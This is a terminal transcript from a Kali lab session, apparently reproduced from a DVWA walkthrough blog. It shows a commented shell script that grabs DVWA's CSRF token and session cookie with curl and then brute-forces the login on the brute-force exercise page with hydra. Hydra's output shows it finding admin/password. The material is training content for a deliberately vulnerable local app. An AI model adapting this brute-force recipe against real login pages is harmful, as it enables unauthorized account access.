root@kali:~# cat hydraattack.sh
# hydraattack.sh — logs into a local DVWA instance with curl, then runs hydra
# against DVWA's brute-force exercise page using the authenticated session.
# No shebang: the transcript invokes it as `sh hydraattack.sh`, so keep it POSIX sh.
# Fetch the login page, saving the cookies the server sets into dvwa.cookie, and
# extract the user_token form value (text after value=' up to the closing quote).
CSRF=$(curl -s -c dvwa.cookie "localhost/dvwa/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
# obtain the CSRF token
# PHPSESSID value: 7th whitespace-separated field of the matching cookie-jar line.
# NOTE(review): read before the login POST below, so this assumes the server keeps
# the same session ID across login — confirm for the DVWA version in use.
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
# obtain the session ID
# Log in with the saved cookies and the token. -b only reads the jar (there is no
# -c here), so any cookie the login response sets is not written back to dvwa.cookie.
curl -s -b dvwa.cookie -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "localhost/dvwa/login.php"
# log in (keep the session)
# hydra run: -l admin single login, -P wordlist file, -e ns also tries the empty
# password and the login as password, -F stop after the first valid pair, -u loop
# users before passwords, -t 1 one task, -w 10 max wait, -v -V print every attempt.
# http-get-form spec is path:query:S=success marker:H=header; ^PASS^ is substituted
# per attempt and "\:" escapes the colon inside the Cookie header (hydra reports
# this escape sequence in its output).
hydra -l admin -P /root/password \
-e ns -F -u -t 1 -w 10 -v -V localhost http-get-form \
"/dvwa/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=${SESSIONID}"
root@kali:~# sh hydraattack.sh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 17:20:03
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 1 task per 1 server, overall 64 tasks, 21 login tries (l:1/p:21), ~0 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target localhost - login "admin" - pass "admin" - 1 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "" - 2 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "a" - 3 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "ab" - 4 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abc" - 5 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcd" - 6 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcde" - 7 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcedf" - 8 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcdef" - 9 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcdefg" - 10 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bc" - 11 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcd" - 12 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcde" - 13 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcdef" - 14 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcdefg" - 15 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cd" - 16 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cde" - 17 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cdef" - 18 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cdefg" - 19 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cdefgh" - 20 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "password" - 21 of 21 [child 0]
[80][http-get-form] host: localhost login: admin password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 17:20:03
原文见:
https://blog.g0tmi1k.com/dvwa/bruteforce-low/